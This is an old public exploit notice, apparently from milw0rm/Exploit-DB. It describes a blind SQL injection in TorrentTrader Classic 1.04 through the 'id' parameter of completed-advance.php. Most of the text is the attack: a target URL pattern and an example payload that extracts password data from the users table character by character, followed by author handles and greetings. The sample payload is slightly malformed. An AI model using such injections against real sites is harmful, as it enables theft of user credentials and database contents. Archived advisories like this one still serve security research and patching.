TorrentTrader Classic 1.04 - Blind SQL Injection

EDB-ID:

6698




Platform:

PHP

Date:

2008-10-07


======================================================
 
==> TorrentTrader Classic <= 1.04 Blind SQL Injection Exploit
 
======================================================
 
==> NamE      : TorrentTrader Classic
 
==> version    : 1.04
 
==> Download : www.torrenttrader.org
 
======================================================
 
==> AuThOr : BazOka-HaCkEr
 
==> EmaiL   : x9j@HoTmaiL.Com
 
==> HomE   : WwW.TrYaG.cc/cc
 
======================================================
 
==> ExplO!te :
 
==> www.TarGeT.com/paTh/completed-advance.php?id=[SQL]
 
==> ExampLe :
 
==> www.TarGeT.com/tracker/completed-advance.php?id=180+AND ascii(SUBSTRING((SELECT Count(password) FROM users LIMIT 1,1)1,1)
 
======================================================
 
==> GreeTz :
 
==> ll Abu-Mahdi ll FeezO ll Mr.SQL ll MoGaTiL ll Abo-Najm ll alra7el ll
 
======================================================

# milw0rm.com [2008-10-07]